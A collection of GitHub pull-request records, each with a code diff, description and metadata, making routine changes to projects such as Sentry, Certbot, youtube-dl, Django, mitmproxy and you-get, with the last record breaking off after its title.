onClick={this.openModal} {...this.buttonProps} /> - </div> </Flex> </PanelItem> ); @@ -116,8 +60,9 @@ const Flex = styled('div')` display: flex; `; -const ProviderName = styled('div')` +const ProviderName = styled(Link)` font-weight: bold; + color: ${props => props.theme.textColor}; `; const ProviderDetails = styled(Flex)` @@ -162,29 +107,6 @@ const StatusWrapper = styled('div')` align-items: center; `; -const NewInstallation = styled('div')` - overflow: hidden; - transform-origin: 0 auto; - animation: ${growDown('59px')} 160ms 500ms ease-in-out forwards, - ${p => highlight(p.theme.yellowLightest)} 1000ms 500ms ease-in-out forwards; -`; - -const StyledInstalledIntegration = styled( - (p: InstalledIntegrationProps & {newlyAdded: boolean}) => - p.newlyAdded ? ( - <NewInstallation> - <InstalledIntegration {...p} /> - </NewInstallation> - ) : ( - <InstalledIntegration {...p} /> - ) -)` - padding: ${space(2)}; - padding-left: 0; - margin-left: 68px; - border-top: 1px dashed ${p => p.theme.borderLight}; -`; - const StyledLink = styled(Link)` color: ${p => p.theme.gray2}; `; diff --git a/src/sentry/static/sentry/app/views/settings/organizationDeveloperSettings/sentryApplicationRow/integrationDirectoryApplicationRow.tsx b/src/sentry/static/sentry/app/views/settings/organizationDeveloperSettings/sentryApplicationRow/integrationDirectoryApplicationRow.tsx new file mode 100644 index 0000000000000..423348179e5f7 --- /dev/null +++ b/src/sentry/static/sentry/app/views/settings/organizationDeveloperSettings/sentryApplicationRow/integrationDirectoryApplicationRow.tsx @@ -0,0 +1,182 @@ +import React from 'react'; +import {Link} from 'react-router'; +import capitalize from 'lodash/capitalize'; +import omit from 'lodash/omit'; +import styled from '@emotion/styled'; +import PropTypes from 'prop-types'; + +import SentryTypes from 'app/sentryTypes'; +import {PanelItem} from 'app/components/panels'; +import {t} from 'app/locale'; +import space from 'app/styles/space'; +import CircleIndicator from 'app/components/circleIndicator'; +import PluginIcon from 'app/plugins/components/pluginIcon'; +import {Organization, SentryApp, SentryAppInstallation} from 'app/types'; +import theme from 'app/utils/theme'; + +const INSTALLED = 'Installed'; +const NOT_INSTALLED = 'Not Installed'; +const PENDING = 'Pending'; + +type Props = { + app: SentryApp; + organization: Organization; + install?: SentryAppInstallation; + isOnIntegrationPage: boolean; + ['data-test-id']?: string; +}; + +export default class SentryApplicationRow extends React.PureComponent<Props> { + static propTypes = { + app: SentryTypes.SentryApplication, + organization: SentryTypes.Organization.isRequired, + install: PropTypes.object, + isOnIntegrationPage: PropTypes.bool, + }; + + get isInternal() { + return this.props.app.status === 'internal'; + } + + hideStatus() { + //no publishing for internal apps so hide the status on the developer settings page + return this.isInternal && !this.props.isOnIntegrationPage; + } + + renderStatus() { + const {app, isOnIntegrationPage} = this.props; + const isInternal = this.isInternal; + const status = this.installationStatus; + if (this.hideStatus()) { + return null; + } + if (isOnIntegrationPage) { + return ( + <React.Fragment> + <StatusIndicator status={status} isInternal={isInternal} /> + </React.Fragment> + ); + } + return <PublishStatus status={app.status} />; + } + + get installationStatus() { + if (this.props.install) { + return capitalize(this.props.install.status); + } + + return NOT_INSTALLED; + } + + linkToEdit() { + const {isOnIntegrationPage} = this.props; + // show the link if the app is internal or we are on the developer settings page + // We don't want to show the link to edit on the main integrations list unless the app is internal + return this.isInternal || !isOnIntegrationPage; + } + + render() { + const {app, organization} = this.props; + return ( + <SentryAppItem data-test-id={app.slug}> + <StyledFlex> + <PluginIcon size={36} pluginId={app.slug} /> + <SentryAppBox> + <SentryAppName hideStatus={this.hideStatus()}> + {this.linkToEdit() ? ( + <SentryAppLink + to={`/settings/${organization.slug}/developer-settings/${app.slug}/`} + > + {app.name} + </SentryAppLink> + ) : ( + <SentryAppLink + to={`/settings/${organization.slug}/sentry-apps/${app.slug}`} + > + {app.name} + </SentryAppLink> + )} + </SentryAppName> + <SentryAppDetails>{this.renderStatus()}</SentryAppDetails> + </SentryAppBox> + </StyledFlex> + </SentryAppItem> + ); + } +} + +const SentryAppItem = styled(PanelItem)` + flex-direction: column; + padding: 5px; +`; + +const StyledFlex = styled('div')` + display: flex; + justify-content: center; + padding: 10px; +`; + +const SentryAppBox = styled('div')` + padding-left: 15px; + padding-right: 15px; + flex: 1; +`; + +const SentryAppDetails = styled('div')` + display: flex; + align-items: center; + margin-top: 6px; + font-size: 0.8em; +`; + +const SentryAppName = styled('div')<{hideStatus: boolean}>` + font-weight: bold; + margin-top: ${p => (p.hideStatus ? '10px' : '0px')}; +`; + +const SentryAppLink = styled(Link)` + color: ${props => props.theme.textColor}; +`; + +const FlexContainer = styled('div')` + display: flex; + align-items: center; +`; +const color = { + [INSTALLED]: 'success', + [NOT_INSTALLED]: 'gray2', + [PENDING]: 'yellowOrange', +}; + +type StatusIndicatorProps = {status: string; theme?: any; isInternal: boolean}; + +const StatusIndicator = styled(({status, ...props}: StatusIndicatorProps) => { + //need to omit isInternal + const propsToPass = omit(props, ['isInternal']); + return ( + <FlexContainer> + <CircleIndicator size={6} color={theme[color[status]]} /> + <div {...propsToPass}>{t(`${status}`)}</div> + </FlexContainer> + ); +})` + color: ${(props: StatusIndicatorProps) => props.theme[color[props.status]]}; + margin-left: ${space(0.5)}; + font-weight: light; + margin-right: ${space(0.75)}; +`; + +type PublishStatusProps = {status: SentryApp['status']; theme?: any}; + +const PublishStatus = styled(({status, ...props}: PublishStatusProps) => { + return ( + <FlexContainer> + <div {...props}>{t(`${status}`)}</div> + </FlexContainer> + ); +})` + color: ${(props: PublishStatusProps) => + props.status === 'published' ? props.theme.success : props.theme.gray2}; + font-weight: light; + margin-right: ${space(0.75)}; +`;
## Problem Add sentry apps to integration directory and remove buttons from the right side of the list. ## Solution Created new files for the IntegrationDIrectoryApplicationRow view. Selectively delete methods, props and components related to the `Install`/`Add Another` buttons on the right side of the list. ## UI <img width="1440" alt="Screen Shot 2020-01-30 at 2 56 55 PM" src="https://user-images.githubusercontent.com/10491193/73497954-d492a580-4370-11ea-92f8-d07f8f4b12d1.png">
https://api.github.com/repos/getsentry/sentry/pulls/16739
2020-01-30T22:57:43Z
2020-01-31T18:13:14Z
2020-01-31T18:13:14Z
2023-05-17T22:06:19Z
3,775
getsentry/sentry
44,170
Alternate help syntax - issue 3371
diff --git a/certbot/cli.py b/certbot/cli.py index d51fd58e06d..4aeac6d348f 100644 --- a/certbot/cli.py +++ b/certbot/cli.py @@ -432,6 +432,10 @@ def __init__(self, args, plugins, detect_defaults=False): self.detect_defaults = detect_defaults self.args = args + + if self.args[0] == 'help': + self.args[0] = '--help' + self.determine_verb() help1 = self.prescan_for_flag("-h", self.help_topics) help2 = self.prescan_for_flag("--help", self.help_topics) diff --git a/certbot/tests/cli_test.py b/certbot/tests/cli_test.py index b0eb965426b..1fa2004d3a7 100644 --- a/certbot/tests/cli_test.py +++ b/certbot/tests/cli_test.py @@ -131,6 +131,26 @@ def test_help(self): self.assertTrue("%s" not in out) self.assertTrue("{0}" not in out) + def test_help_no_dashes(self): + self._help_output(['help']) # assert SystemExit is raised here + + out = self._help_output(['help', 'all']) + self.assertTrue("--configurator" in out) + self.assertTrue("how a cert is deployed" in out) + self.assertTrue("--webroot-path" in out) + self.assertTrue("--text" not in out) + self.assertTrue("--dialog" not in out) + self.assertTrue("%s" not in out) + self.assertTrue("{0}" not in out) + + out = self._help_output(['help', 'install']) + self.assertTrue("--cert-path" in out) + self.assertTrue("--key-path" in out) + + out = self._help_output(['help', 'revoke']) + self.assertTrue("--cert-path" in out) + self.assertTrue("--key-path" in out) + def test_parse_domains(self): short_args = ['-d', 'example.com'] namespace = self.parse(short_args)
I originally followed the approach detailed in the first comment here: https://github.com/certbot/certbot/issues/3371, but realized there was a much shorter way to implement this. (Can easily switch back to the other approach if need be.) Also, `certbot help --help help -h standalone` works!
https://api.github.com/repos/certbot/certbot/pulls/4068
2017-01-17T17:22:07Z
2017-01-17T23:19:34Z
2017-01-17T23:19:34Z
2017-01-17T23:19:34Z
478
certbot/certbot
3,228
[pornhub] Fixed view count extraction
diff --git a/youtube_dl/extractor/pornhub.py b/youtube_dl/extractor/pornhub.py index 3567a32839e..c64c870dc8e 100644 --- a/youtube_dl/extractor/pornhub.py +++ b/youtube_dl/extractor/pornhub.py @@ -341,7 +341,7 @@ def add_video_url(video_url): webpage, 'uploader', fatal=False) view_count = self._extract_count( - r'<span class="count">([\d,\.]+)</span> views', webpage, 'view') + r'<span class="count">([\d,\.]+)</span> [Vv]iews', webpage, 'view') like_count = self._extract_count( r'<span class="votesUp">([\d,\.]+)</span>', webpage, 'like') dislike_count = self._extract_count(
### Before submitting a *pull request* make sure you have: - [x] At least skimmed through [adding new extractor tutorial](https://github.com/ytdl-org/youtube-dl#adding-support-for-a-new-site) and [youtube-dl coding conventions](https://github.com/ytdl-org/youtube-dl#youtube-dl-coding-conventions) sections - [x] [Searched](https://github.com/ytdl-org/youtube-dl/search?q=is%3Apr&type=Issues) the bugtracker for similar pull requests - [x] Checked the code with [flake8](https://pypi.python.org/pypi/flake8) ### In order to be accepted and merged into youtube-dl each piece of code must be in public domain or released under [Unlicense](http://unlicense.org/). Check one of the following options: - [ ] I am the original author of this code and I am willing to release it under [Unlicense](http://unlicense.org/) - [x] I am not the original author of this code but it is in public domain or released under [Unlicense](http://unlicense.org/) (provide reliable evidence) ### What is the purpose of your *pull request*? - [x] Bug fix --- ### Description of your *pull request* and other information Since the UI change of pornhub the 'v' in View count is spelled with a capital 'V'. I rewrote the regex to include both a common 'v' and capital 'v' to fix the view count extraction
https://api.github.com/repos/ytdl-org/youtube-dl/pulls/26621
2020-09-18T22:09:06Z
2020-09-18T22:59:19Z
2020-09-18T22:59:19Z
2020-09-18T22:59:19Z
202
ytdl-org/youtube-dl
50,504
[bug fix]rm invalid params
diff --git a/ppstructure/utility.py b/ppstructure/utility.py index a1e29344cb..28ef3d9f47 100644 --- a/ppstructure/utility.py +++ b/ppstructure/utility.py @@ -16,7 +16,7 @@ import PIL from PIL import Image, ImageDraw, ImageFont import numpy as np -from tools.infer.utility import draw_ocr_box_txt, str2bool, str2int_tuple, init_args as infer_args +from tools.infer.utility import draw_ocr_box_txt, str2bool, init_args as infer_args import math
https://api.github.com/repos/PaddlePaddle/PaddleOCR/pulls/10605
2023-08-10T09:03:39Z
2023-08-11T06:12:26Z
2023-08-11T06:12:26Z
2024-03-08T03:11:16Z
131
PaddlePaddle/PaddleOCR
42,227
Change example URLs in readme (fixes #5018)
diff --git a/README.md b/README.md index a2c1483117c..8ea31d6059f 100644 --- a/README.md +++ b/README.md @@ -571,7 +571,7 @@ Support requests for services that **do** purchase the rights to distribute thei ### How can I detect whether a given URL is supported by youtube-dl? -For one, have a look at the [list of supported sites](docs/supportedsites.md). Note that it can sometimes happen that the site changes its URL scheme (say, from http://example.com/v/1234567 to http://example.com/v/1234567 ) and youtube-dl reports an URL of a service in that list as unsupported. In that case, simply report a bug. +For one, have a look at the [list of supported sites](docs/supportedsites.md). Note that it can sometimes happen that the site changes its URL scheme (say, from http://example.com/video/1234567 to http://example.com/v/1234567 ) and youtube-dl reports an URL of a service in that list as unsupported. In that case, simply report a bug. It is *not* possible to detect whether a URL is supported or not. That's because youtube-dl contains a generic extractor which matches **all** URLs. You may be tempted to disable, exclude, or remove the generic extractor, but the generic extractor not only allows users to extract videos from lots of websites that embed a video from another service, but may also be used to extract video from a service that it's hosting itself. Therefore, we neither recommend nor support disabling, excluding, or removing the generic extractor.
https://api.github.com/repos/ytdl-org/youtube-dl/pulls/5019
2015-02-20T22:47:52Z
2015-02-20T22:56:57Z
2015-02-20T22:56:57Z
2015-02-20T22:56:58Z
361
ytdl-org/youtube-dl
49,764
Make log truncation configurable
diff --git a/mitmproxy/proxy/layer.py b/mitmproxy/proxy/layer.py index 275125a3f8..27328c4fc7 100644 --- a/mitmproxy/proxy/layer.py +++ b/mitmproxy/proxy/layer.py @@ -27,6 +27,10 @@ """ +MAX_LOG_STATEMENT_SIZE = 512 +"""Maximum size of individual log statements before they will be truncated.""" + + class Paused(NamedTuple): """ State of a layer that's paused because it is waiting for a command reply. @@ -97,8 +101,8 @@ def __repr__(self): def __debug(self, message): """yield a Log command indicating what message is passing through this layer.""" - if len(message) > 512: - message = message[:512] + "…" + if len(message) > MAX_LOG_STATEMENT_SIZE: + message = message[:MAX_LOG_STATEMENT_SIZE] + "…" if Layer.__last_debug_message == message: message = message.split("\n", 1)[0].strip() if len(message) > 256:
Provide addons with the means to disable log truncation. We're in a pretty hot path here, so we'll keep this as a constant instead of a full-blown mitmproxy option. /cc @erikshestopal
https://api.github.com/repos/mitmproxy/mitmproxy/pulls/6288
2023-08-01T09:31:41Z
2023-08-01T10:14:02Z
2023-08-01T10:14:02Z
2023-08-01T11:37:21Z
253
mitmproxy/mitmproxy
27,751
extend estimation of area under curve of y=x using monte carlo simulation to any given lower and upper bound
diff --git a/maths/monte_carlo.py b/maths/monte_carlo.py index 4980c5c55c8c..6a407e98badd 100644 --- a/maths/monte_carlo.py +++ b/maths/monte_carlo.py @@ -42,29 +42,34 @@ def area_under_line_estimator(iterations: int, An implementation of the Monte Carlo method to find area under y = x where x lies between min_value to max_value 1. Let x be a uniformly distributed random variable between min_value to max_value - 2. Expected value of x = integration of x from min_value to max_value + 2. Expected value of x = (integration of x from min_value to max_value) / (max_value - min_value) 3. Finding expected value of x: a. Repeatedly draw x from uniform distribution b. Expected value = average of those values - 4. Actual value = 1/2 + 4. Actual value = (max_value^2 - min_value^2) / 2 5. Returns estimated value """ - return mean(uniform(min_value, max_value) for _ in range(iterations)) + return mean(uniform(min_value, max_value) for _ in range(iterations)) * (max_value - min_value) -def area_under_line_estimator_check(iterations: int) -> None: +def area_under_line_estimator_check(iterations: int, + min_value: float=0.0, + max_value: float=1.0) -> None: """ Checks estimation error for area_under_line_estimator func 1. Calls "area_under_line_estimator" function 2. Compares with the expected value 3. Prints estimated, expected and error value """ - estimate = area_under_line_estimator(iterations) + + estimated_value = area_under_line_estimator(iterations, min_value, max_value) + expected_value = (max_value*max_value - min_value*min_value) / 2 + print("******************") - print("Estimating area under y=x where x varies from 0 to 1") - print("Expected value is ", 0.5) - print("Estimated value is ", estimate) - print("Total error is ", abs(estimate - 0.5)) + print("Estimating area under y=x where x varies from ",min_value, " to ",max_value) + print("Estimated value is ", estimated_value) + print("Expected value is ", expected_value) + print("Total error is ", abs(estimated_value - expected_value)) print("******************")
extend estimation of area under curve of y=x using monte carlo simulation to any given lower and upper bound. ### **Checklist:** * [x] I have read [CONTRIBUTING.md](https://github.com/TheAlgorithms/Python/blob/master/CONTRIBUTING.md). * [x] This pull request is all my own work -- I have not plagiarized. * [x] I know that pull requests will not be merged if they fail the automated tests. * [x] This PR only changes one algorithm file. To ease review, please open separate PRs for separate algorithms. * [x] All new Python files are placed inside an existing directory. * [x] All filenames are in all lowercase characters with no spaces or dashes. * [x] All functions and variable names follow Python naming conventions. * [x] All function parameters and return values are annotated with Python [type hints](https://docs.python.org/3/library/typing.html). * [ ] All functions have [doctests](https://docs.python.org/3/library/doctest.html) that pass the automated testing. * [ ] All new algorithms have a URL in its comments that points to Wikipedia or other similar explanation. * [ ] If this pull request resolves one or more open issues then the commit message contains `Fixes: #{$ISSUE_NO}`.
https://api.github.com/repos/TheAlgorithms/Python/pulls/1784
2020-02-22T18:52:04Z
2020-02-22T22:33:13Z
2020-02-22T22:33:13Z
2020-02-22T23:35:44Z
597
TheAlgorithms/Python
29,720
OriginalHighRes 128 model update
diff --git a/plugins/Model_OriginalHighRes/Trainer.py b/plugins/Model_OriginalHighRes/Trainer.py index e05f90a334..259dcdf4a3 100644 --- a/plugins/Model_OriginalHighRes/Trainer.py +++ b/plugins/Model_OriginalHighRes/Trainer.py @@ -1,13 +1,11 @@ import time - import numpy from lib.training_data import TrainingDataGenerator, stack_images TRANSFORM_PRC = 115. -#TRANSFORM_PRC = 150. class Trainer(): @@ -22,13 +20,15 @@ class Trainer(): def __init__(self, model, fn_A, fn_B, batch_size, *args): self.batch_size = batch_size self.model = model + from timeit import default_timer as clock + self._clock = clock + - #generator = TrainingDataGenerator(self.random_transform_args, 160) - + #generator = TrainingDataGenerator(self.random_transform_args, 160) # make sre to keep zoom=2 or you won't get 128x128 vectors as input #generator = TrainingDataGenerator(self.random_transform_args, 220, 5, zoom=2) - generator = TrainingDataGenerator(self.random_transform_args, 160, 6, zoom=2) #generator = TrainingDataGenerator(self.random_transform_args, 180, 7, zoom=2) + generator = TrainingDataGenerator(self.random_transform_args, 160, 5, zoom=2) self.images_A = generator.minibatchAB(fn_A, self.batch_size) self.images_B = generator.minibatchAB(fn_B, self.batch_size) @@ -37,19 +37,19 @@ def __init__(self, model, fn_A, fn_B, batch_size, *args): def train_one_step(self, iter_no, viewer): - + when = self._clock() _, warped_A, target_A = next(self.images_A) _, warped_B, target_B = next(self.images_B) loss_A = self.model.autoencoder_A.train_on_batch(warped_A, target_A) loss_B = self.model.autoencoder_B.train_on_batch(warped_B, target_B) - - print("[{0}] [#{1:05d}] loss_A: {2:.5f}, loss_B: {3:.5f}".format( - time.strftime("%H:%M:%S"), iter_no, loss_A, loss_B), + + print("[{0}] [#{1:05d}] [{2:.3f}s] loss_A: {3:.5f}, loss_B: {4:.5f}".format( + time.strftime("%H:%M:%S"), iter_no, self._clock()-when, loss_A, loss_B), end='\r') if viewer is not None: - viewer(self.show_sample(target_A[0:24], target_B[0:24]), "training using {}, bs={}".format(self.model, self.batch_size)) + viewer(self.show_sample(target_A[0:8], target_B[0:8]), "training using {}, bs={}".format(self.model, self.batch_size)) def show_sample(self, test_A, test_B):
Required for OriginalHighRes Model to function
https://api.github.com/repos/deepfakes/faceswap/pulls/418
2018-06-12T10:19:42Z
2018-06-14T22:34:56Z
2018-06-14T22:34:55Z
2018-06-15T12:46:40Z
724
deepfakes/faceswap
18,709
Fixed #34063 -- Made AsyncClient populate request.POST from form data body.
diff --git a/django/test/client.py b/django/test/client.py index 99e831aebda85..8b926fc38de75 100644 --- a/django/test/client.py +++ b/django/test/client.py @@ -14,7 +14,7 @@ from django.conf import settings from django.core.handlers.asgi import ASGIRequest from django.core.handlers.base import BaseHandler -from django.core.handlers.wsgi import WSGIRequest +from django.core.handlers.wsgi import LimitedStream, WSGIRequest from django.core.serializers.json import DjangoJSONEncoder from django.core.signals import got_request_exception, request_finished, request_started from django.db import close_old_connections @@ -198,7 +198,8 @@ async def __call__(self, scope): sender=self.__class__, scope=scope ) request_started.connect(close_old_connections) - request = ASGIRequest(scope, body_file) + # Wrap FakePayload body_file to allow large read() in test environment. + request = ASGIRequest(scope, LimitedStream(body_file, len(body_file))) # Sneaky little hack so that we can easily get round # CsrfViewMiddleware. This makes life easier, and is probably required # for backwards compatibility with external tests against admin views. @@ -598,7 +599,10 @@ def request(self, **request): body_file = request.pop("_body_file") else: body_file = FakePayload("") - return ASGIRequest(self._base_scope(**request), body_file) + # Wrap FakePayload body_file to allow large read() in test environment. + return ASGIRequest( + self._base_scope(**request), LimitedStream(body_file, len(body_file)) + ) def generic( self, diff --git a/tests/test_client/tests.py b/tests/test_client/tests.py index 57dc22ea0c34c..5612ae4462d31 100644 --- a/tests/test_client/tests.py +++ b/tests/test_client/tests.py @@ -1103,6 +1103,14 @@ async def test_get_data(self): response = await self.async_client.get("/get_view/", {"var": "val"}) self.assertContains(response, "This is a test. val is the value.") + async def test_post_data(self): + response = await self.async_client.post("/post_view/", {"value": 37}) + self.assertContains(response, "Data received: 37 is the value.") + + async def test_body_read_on_get_data(self): + response = await self.async_client.get("/post_view/") + self.assertContains(response, "Viewing GET page.") + @override_settings(ROOT_URLCONF="test_client.urls") class AsyncRequestFactoryTest(SimpleTestCase): @@ -1147,6 +1155,16 @@ async def async_generic_view(request): self.assertEqual(response.status_code, 200) self.assertEqual(response.content, b'{"example": "data"}') + async def test_request_limited_read(self): + tests = ["GET", "POST"] + for method in tests: + with self.subTest(method=method): + request = self.request_factory.generic( + method, + "/somewhere", + ) + self.assertEqual(request.read(200), b"") + def test_request_factory_sets_headers(self): request = self.request_factory.get( "/somewhere/", diff --git a/tests/test_client/views.py b/tests/test_client/views.py index 773e9e4e987f3..01850257b5165 100644 --- a/tests/test_client/views.py +++ b/tests/test_client/views.py @@ -90,6 +90,8 @@ def post_view(request): c = Context() else: t = Template("Viewing GET page.", name="Empty GET Template") + # Used by test_body_read_on_get_data. + request.read(200) c = Context() return HttpResponse(t.render(c))
[Trac issue](https://code.djangoproject.com/ticket/34063) We found that when `FakePayload` tries to `read` and is given a number of bytes that is larger than the available content, it hits an assert statement and fails. When we (@kevswanberg @carltongibson) compared this to the WSGI `TestClient`, we noticed that it converted its `_stream` member to a `LimitedStream`, which has a more robust `read` method. When we made this change to `asgi.py` we found that the `test_client` tests still passed
https://api.github.com/repos/django/django/pulls/16210
2022-10-20T22:47:19Z
2022-11-08T12:53:34Z
2022-11-08T12:53:34Z
2022-11-08T12:53:34Z
867
django/django
50,863
grammatical fixes on chat_stores.md
diff --git a/docs/module_guides/storing/chat_stores.md b/docs/module_guides/storing/chat_stores.md index d5c67c861cc93..bc45561222dc2 100644 --- a/docs/module_guides/storing/chat_stores.md +++ b/docs/module_guides/storing/chat_stores.md @@ -1,14 +1,14 @@ # Chat Stores -A chat store serves as a centralized interface to store your chat history. Chat history is unique to other storage formats, since the order of messages is important to maintining an overall conversation. +A chat store serves as a centralized interface to store your chat history. Chat history is unique compared to other storage formats, since the order of messages is important for maintaining an overall conversation. -Chat stores can be organize sequences of chat messages by keys (like `user_ids` or other unique identifiable strings), and handle `delete`, `insert`, and `get` operations. +Chat stores can organize sequences of chat messages by keys (like `user_ids` or other unique identifiable strings), and handle `delete`, `insert`, and `get` operations. ## SimpleChatStore -The most basic chat store is `SimpleChatStore`, which stores messages in memory and saves to/from disk, or can be serlized and stored somewhere else. +The most basic chat store is `SimpleChatStore`, which stores messages in memory and can save to/from disk, or can be serialized and stored elsewhere. -Typically, you will insansiate a chat store and give it to a memory module. Memory modules that use chat stores will default to using `SimpleChatStore` if not provided. +Typically, you will instantiate a chat store and give it to a memory module. Memory modules that use chat stores will default to using `SimpleChatStore` if not provided. ```python from llama_index.core.storage.chat_store import SimpleChatStore @@ -49,7 +49,7 @@ loaded_chat_store = SimpleChatStore.parse_raw(chat_store_string) ## RedisChatStore -Using `RedisChatStore`, you can store your chat history remotely, without having to worry abouyt manually persisting and loading the chat history. +Using `RedisChatStore`, you can store your chat history remotely, without having to worry about manually persisting and loading the chat history. ```python from llama_index.storage.chat_store.redis import RedisChatStore
# Description There were grammatical/wrongly typed words in code explanations. ## Type of Change - [x] Bug fix (non-breaking change which fixes an issue)
https://api.github.com/repos/run-llama/llama_index/pulls/12012
2024-03-17T10:58:28Z
2024-03-19T15:22:41Z
2024-03-19T15:22:41Z
2024-03-19T15:22:41Z
506
run-llama/llama_index
6,074
Cleaned "powered by" section a little.
diff --git a/flask_website/listings/projects.py b/flask_website/listings/projects.py index 04e8c54957..56ac083ffb 100644 --- a/flask_website/listings/projects.py +++ b/flask_website/listings/projects.py @@ -38,10 +38,6 @@ def to_json(self): <p> The website of the Brighton Python User Group ''', source='http://github.com/j4mie/brightonpy.org/'), - Project('vlasiku.lojban.org', 'http://vlasisku.lojban.org/', ''' - <p> - An intelligent search engine for the Lojban dictionary. - '''), Project(u's h o r e … software development', 'http://shore.be/', ''' <p>Corporate website of Shore Software Development. '''), @@ -118,7 +114,7 @@ def to_json(self): Activity stream aggregator and umbrella home page for the Nuxeo Open Source ECM project sites. ''', source='https://github.com/sfermigier/nuxeo.org'), - Project('Planete GT LL', 'http://www.gt-logiciel-libre.org/', u''' + Project('Planete GT LL', None, u''' <p> News aggregator for the open source workgroup of the Paris Region innovation cluster, Systematic. @@ -133,10 +129,6 @@ def to_json(self): <p> A collection of responsive web designs. '''), - Project('Life Short, Coding More', 'http://www.liul.net/', u''' - <p> - Personal blog. - '''), Project('Flask Feedback', 'http://feedback.flask.pocoo.org/', u''' <p> Website by the Flask project that collects feedback from @@ -146,10 +138,6 @@ def to_json(self): <p> Russian game website. '''), - Project('Python Edinburgh', 'http://www.pythonedinburgh.org/', u''' - <p> - Website of the user group for Pythonistas in Edinburgh. - '''), Project('Get Python 3', 'http://getpython3.net/', u''' <p> A website to collect feedback of Python third party @@ -223,7 +211,7 @@ def to_json(self): <p> An Online Logic Assistent Based on Coq. ''', source='http://github.com/dcolish/Cockerel'), - Project('Ryshcate', 'http://ryshcate.leafstorm.us/', ''' + Project('Ryshcate', None, ''' <p> Ryshcate is a Flask powered pastebin with sourcecode available.
https://api.github.com/repos/pallets/flask/pulls/505
2012-05-07T11:34:58Z
2012-05-07T15:08:19Z
2012-05-07T15:08:19Z
2020-11-14T05:33:46Z
599
pallets/flask
20,831
[ffmpeg] fix concat list when output dir is not pwd
diff --git a/src/you_get/processor/ffmpeg.py b/src/you_get/processor/ffmpeg.py index a8599e527e..433aff3fcc 100644 --- a/src/you_get/processor/ffmpeg.py +++ b/src/you_get/processor/ffmpeg.py @@ -26,6 +26,18 @@ def get_usable_ffmpeg(cmd): def has_ffmpeg_installed(): return FFMPEG is not None +# Given a list of segments and the output path, generates the concat +# list and returns the path to the concat list. +def generate_concat_list(files, output): + concat_list_path = output + '.txt' + concat_list_dir = os.path.dirname(concat_list_path) + with open(concat_list_path, 'w', encoding='utf-8') as concat_list: + for file in files: + if os.path.isfile(file): + relpath = os.path.relpath(file, start=concat_list_dir) + concat_list.write('file %s\n' % parameterize(relpath)) + return concat_list_path + def ffmpeg_concat_av(files, output, ext): print('Merging video parts... ', end="", flush=True) params = [FFMPEG] + LOGLEVEL @@ -52,17 +64,9 @@ def ffmpeg_convert_ts_to_mkv(files, output='output.mkv'): def ffmpeg_concat_mp4_to_mpg(files, output='output.mpg'): # Use concat demuxer on FFmpeg >= 1.1 if FFMPEG == 'ffmpeg' and (FFMPEG_VERSION[0] >= 2 or (FFMPEG_VERSION[0] == 1 and FFMPEG_VERSION[1] >= 1)): - concat_list = open(output + '.txt', 'w', encoding="utf-8") - for file in files: - if os.path.isfile(file): - concat_list.write("file %s\n" % parameterize(file)) - concat_list.close() - - params = [FFMPEG] + LOGLEVEL - params.extend(['-f', 'concat', '-safe', '-1', '-y', '-i']) - params.append(output + '.txt') - params += ['-c', 'copy', output] - + concat_list = generate_concat_list(files, output) + params = [FFMPEG] + LOGLEVEL + ['-y', '-f', 'concat', '-safe', '-1', + '-i', concat_list, '-c', 'copy', output] if subprocess.call(params) == 0: os.remove(output + '.txt') return True @@ -115,18 +119,10 @@ def ffmpeg_concat_flv_to_mp4(files, output='output.mp4'): print('Merging video parts... ', end="", flush=True) # Use concat demuxer on FFmpeg >= 1.1 if FFMPEG == 'ffmpeg' and (FFMPEG_VERSION[0] >= 2 or (FFMPEG_VERSION[0] == 1 and FFMPEG_VERSION[1] >= 1)): - concat_list = open(output + '.txt', 'w', encoding="utf-8") - for file in files: - if os.path.isfile(file): - # for escaping rules, see: - # https://www.ffmpeg.org/ffmpeg-utils.html#Quoting-and-escaping - concat_list.write("file %s\n" % parameterize(file)) - concat_list.close() - - params = [FFMPEG] + LOGLEVEL + ['-f', 'concat', '-safe', '-1', '-y', '-i'] - params.append(output + '.txt') - params += ['-c', 'copy', '-bsf:a', 'aac_adtstoasc', output] - + concat_list = generate_concat_list(files, output) + params = [FFMPEG] + LOGLEVEL + ['-y', '-f', 'concat', '-safe', '-1', + '-i', concat_list, '-c', 'copy', + '-bsf:a', 'aac_adtstoasc', output] subprocess.check_call(params) os.remove(output + '.txt') return True @@ -162,16 +158,10 @@ def ffmpeg_concat_mp4_to_mp4(files, output='output.mp4'): print('Merging video parts... ', end="", flush=True) # Use concat demuxer on FFmpeg >= 1.1 if FFMPEG == 'ffmpeg' and (FFMPEG_VERSION[0] >= 2 or (FFMPEG_VERSION[0] == 1 and FFMPEG_VERSION[1] >= 1)): - concat_list = open(output + '.txt', 'w', encoding="utf-8") - for file in files: - if os.path.isfile(file): - concat_list.write("file %s\n" % parameterize(file)) - concat_list.close() - - params = [FFMPEG] + LOGLEVEL + ['-f', 'concat', '-safe', '-1', '-y', '-i'] - params.append(output + '.txt') - params += ['-c', 'copy', '-bsf:a', 'aac_adtstoasc', output] - + concat_list = generate_concat_list(files, output) + params = [FFMPEG] + LOGLEVEL + ['-y', '-f', 'concat', '-safe', '-1', + '-i', concat_list, '-c', 'copy', + '-bsf:a', 'aac_adtstoasc', output] subprocess.check_call(params) os.remove(output + '.txt') return True
Relative paths in the concat list are considered relative to the parent directory of the script, not the calling directory. This isn't entirely obvious from the documentation, but it is easy to infer from the concat demuxer's concept of "safety", and easy to test (confirmed on FFmpeg 3.2.2). See https://ffmpeg.org/ffmpeg-all.html#concat-1 for details. This commit fixes the wrong relative paths when `--output-dir` is specified and not pwd. This commit also - Factors out common concat list writer code; - Slightly simplifies the code to collect FFmpeg params (on Py35+ we can further simplify by unpacking `LOGLEVEL` with the star operator right in the list literal). <!-- Reviewable:start --> --- This change is [<img src="https://reviewable.io/review_button.svg" height="34" align="absmiddle" alt="Reviewable"/>](https://reviewable.io/reviews/soimort/you-get/1558) <!-- Reviewable:end -->
https://api.github.com/repos/soimort/you-get/pulls/1558
2016-12-16T04:48:47Z
2017-01-02T15:09:48Z
2017-01-02T15:09:48Z
2017-01-02T15:48:51Z
1,220
soimort/you-get
21,085
Added Enjin
